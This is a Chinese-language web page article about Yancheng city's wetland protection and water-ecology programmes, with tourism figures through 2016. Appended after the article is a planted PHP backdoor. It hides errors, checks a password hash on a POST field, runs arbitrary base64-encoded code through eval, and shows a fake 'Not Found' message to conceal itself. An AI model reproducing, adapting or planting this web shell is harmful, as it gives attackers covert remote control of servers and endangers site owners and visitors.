湿地之窗

首页 > 科研保护 > 湿地之窗 >

    盐城市做好湿地文章 建设水生态文明城市

            东方湿地之都,水绿生态盐城。位于黄海之滨的盐城市拥有江苏省最长的海岸线、最大的沿海滩涂和最广的海域面积。全市地势平坦,河网密布、河渠纵横,素有“百河之城、鱼米之乡”之美誉。
      近几年来,盐城市委、市政府多措并举推动绿色发展、建设美丽盐城,通过实施流域水系连通、区域水环境治理、盐龙湖生态净化工程、城乡河道整治三年行动等一系列治水兴水举措,进行疏浚活水、生态修复,水生态建设有了一定的基础。借此契机,盐城市积极开展的水生态文明城市建设,既是贯彻落实中央和省市决策部署的工作任务,也是推动绿色发展、建设美丽盐城的内在动力,更是改善生态环境、增进民生幸福的现实要求。
      目前,全市已经实现了全市水环境质量的整体提升,水网自净能力得到增强,湿地、水域面积持续增加,水土保持能力进一步增强。促进了重点保护区生物多样性的明显改善,开展湖荡湿地生态系统修复、沿海湿地保护等工程,有效遏制了湿地退化,保护湿地的生物多样性。在盐城丹顶鹤自然保护区、大丰麋鹿保护区等区域内开展了湿地保护与退化湿地恢复治理,确保珍稀动物保护区面积不减少。以海盐博物馆、盐镇水街、瓢城遗址公园、盐龙湖、大洋湾生态湿地公园等为节点,形成了特色鲜明的城市生态景观功能区。构筑沿海防洪安全保障体系和沿海生态防护林,保护和修复了沿海湿地,发挥湿地抵御海潮、调节气候、美化环境的功能。
      水生态环境的明显改善,带动了滨水产业、旅游产业的发展。103个水美乡镇(村)建设,全市人居环境得到大幅度提升;到2016年,水美乡镇(村)旅游人次达900万人次;两个国家级自然保护区生态湿地的建设和区域水环境的整治,有效提升了旅游开发区的知名度,大幅增加了旅游收入,到2016年大丰麋鹿保护区等景点接待游客达1100万人次、实现旅游综合收入80亿元,同比增长23.1%以上……这一串串数据,充分展示了水生态收获的绿色红利。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>